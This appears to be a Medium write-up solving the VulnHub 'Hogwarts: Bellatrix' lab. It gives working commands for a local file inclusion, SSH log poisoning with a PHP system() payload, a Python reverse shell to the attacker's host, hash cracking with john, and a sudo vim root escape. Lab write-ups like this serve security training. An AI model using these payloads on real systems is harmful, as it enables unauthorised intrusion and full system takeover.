VulnHub: Hogwarts: Bellatrix

Today we will take a look at Vulnhub: Bellatrix. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan

Command: sudo nmap -p- -sV -sC -oN nmap/open — open 192.168.0.105

Nmap scan report for 192.168.0.113
Host is up (0.032s latency).
Not shown: 61087 closed tcp ports (reset), 4446 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4b:ce:c7:5a:9c:1f:8b:cd:47:03:08:69:85:c2:91:49 (RSA)
| 256 a1:2a:a8:15:99:04:cc:2a:1e:e3:50:00:f3:55:c2:cc (ECDSA)
|_ 256 2c:d3:ec:6f:4f:5b:4a:e0:ea:0a:c3:0d:2f:cb:78:17 (ED25519)
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
|_http-title: AvadaKedavra
|_http-server-header: Apache/2.4.46 (Ubuntu)
MAC Address: 3C:A0:67:C5:35:33 (Liteon Technology)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • Web

After seeing the .php extension, we go there.

http://192.168.0.113/ikilledsiriusblack.php

There is such a thing in the source code below.

Yes, that’s what you think. Let’s check. ;)

http://192.168.0.113/ikilledsiriusblack.php?file=../../../../../../etc/passwd

We need to get the reverse shell from here. If we investigate, we find.

Let’s check

http://192.168.0.113/ikilledsiriusblack.php?file=../../../../../../var/log/auth.log

Command: ssh ‘<?php system($_GET[“cmd”]); ?>’@192.168.0.113

http://192.168.0.113/ikilledsiriusblack.php?file=../../../../../..//var/log/auth.log&cmd=ls%20-la

Yes it works.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.107",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

After logging in

Command: script /dev/null -c bash

Command: export TERM=xterm

ctrl+z

Command: stty raw -echo ; fg

Command: reset

  • Lestrange

As we look inside, we see a folder whose name is encrypted with base64. There are two files in it. One is the password list and the other is the hash form of the name and password.

Command: john hash --wordlist=pass.txtUsing default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ihateharrypotter (lestrange)
1g 0:00:00:00 DONE (2022-05-22 20:52) 2.380g/s 273.8p/s 273.8c/s 273.8C/s gryffondor
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Command: su lestrange

  • Root

Command: sudo -l

(ALL : ALL) NOPASSWD: /usr/bin/vim

Command: sudo /usr/bin/vim -c ‘:!/bin/sh’

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

--

--

--

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Django Send Email

Changing the Default Favicon and Title in Dash App

My path to becoming a software developer

Functional Programming vs OOP

Vets Who Code — Servicing Tech Opportunities to Those Who Served

Facade Design Pattern — Automation Testing

How are anti-cheats written?

3D Bears metaverse compatibility

3d bears metaverse compatibility

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

Watcher Writeup THM

TryHackMe-Metasploit: Linux PrivEsc

Command Line Essentials